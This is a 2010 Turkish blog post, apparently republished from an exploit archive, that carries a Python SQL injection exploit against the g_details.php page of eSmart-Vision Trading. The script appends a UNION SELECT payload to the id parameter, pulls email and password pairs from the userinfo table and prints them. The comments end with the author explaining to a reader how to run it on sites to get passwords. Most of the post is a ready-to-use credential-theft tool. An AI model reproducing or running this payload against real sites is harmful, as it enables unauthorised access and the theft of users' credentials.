"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

2 Ağustos 2010 Pazartesi

eSmart-Vision Trading (g_details.php id) SQL Injection Exploit (.py)

http://inj3ct0r.com/exploits/13549



====================================================================
eSmart-Vision Trading (g_details.php id) SQL Injection Exploit (.py)
====================================================================

#!/usr/bin/env python
#-*- coding:utf-8 -*-

# eSmart-Vision Trading (g_details.php id) SQL Injection Exploit (.py)
# Found & Coded By ZoRLu
# Tested on my vista proof: http://img251.imageshack.us/img251/7747/esmart.jpg
# Date: 01/08/2010
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " eSmart-Vision Trading SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

add = "http://"
add2 = "/"

sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "g_details.php"
sql = "?id=0000000+union+select+1,2,3,4,concat(0x3e3e3e,email,0x3a3a,password,0x3e3e3e),6,7+from+userinfo--"
url = sitemiz + vulnfile + sql

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r">>>(.*)([0-9a-fA-F])(.*)>>>", veri)
if len(aliver) > 0:
print "email::password: " + aliver[0][0]

print "\nGood Job Bro!"
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"



# Inj3ct0r.com [2010-08-02]

2 yorum:

Adsız dedi ki...

Ustat ya birşey sorucam bu exploitsleri nasıl çalıştırıyorsun mantığı nedir

ZoRLu dedi ki...

pyton kurulu olmalı bilgisayarında. daha sonra exploiti .py uzantılı kaydet ve resimdeki adımları uygula eğer sitede acık varsa verir sana şifre vs işte resim ;)

http://img251.imageshack.us/img251/7747/esmart.jpg

 
Dizi